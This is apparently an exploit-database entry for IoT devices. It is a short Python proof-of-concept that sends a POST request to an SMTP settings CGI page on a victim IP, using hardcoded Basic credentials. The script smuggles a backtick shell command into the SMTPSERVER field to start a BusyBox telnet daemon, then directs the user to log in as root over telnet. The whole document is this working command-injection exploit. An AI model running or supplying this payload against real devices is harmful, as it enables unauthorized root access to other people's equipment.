Multiple IoT Vendors – Multiple Vulnerabilities

                                                #!/usr/bin/python
import requests
import os
import time

print "Unauthenticated Remote Code Execution"

url = 'http://VICTIM-IP/cgi-bin/smtpset.cgi' # Adjust IP address
payload = {'UseUserDefined': '1','SMTPSERVER':'`/bin/busybox telnetd`','SMTPPORT':'25','SMTPNAME':'','SMTPPASSWD':'','SMTPTEST':'SMTP+server+test'}
headers = { "Authorization": "Basic c3VwZXJ2aXNvcjpkYW5nZXJvdQ==", "Content-type": "application/x-www-form-urlencoded"}

r = requests.post(url, data=payload, headers=headers)
time.sleep(5)

print "\nTry to connect to your target via telnet and use the user name root."